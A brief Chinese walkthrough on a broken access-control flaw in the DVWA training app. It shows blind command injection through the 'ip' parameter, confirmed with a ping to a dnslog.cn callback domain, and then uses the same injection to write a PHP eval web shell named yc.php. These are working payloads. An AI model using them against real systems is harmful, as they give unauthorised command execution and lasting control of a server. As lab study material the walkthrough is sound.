DVWA失效的访问控制

失效的访问控制，可以认为是系统对一些功能进行了访问或权限限制，但因为种种原因，限制并没有生效，造成失效的访问控制漏洞,比如越权等

这里以DVWA为例，先访问低难度的命令执行并抓包

删除cookie，并在请求头添加路径\dv\vulnerabilities\exec\source\low.php

因为没有回显，使用dnslog，ip=127.0.0.1%26ping+v0999s.2iknuw.dnslog.cn&Submit=Submit

这里还可以通过这个漏洞写入木马

ip=127.0.0.1%26echo+"<%3fphp+%40eval($_POST['cmd'])%3b%3f>">yc.php&Submit=Submit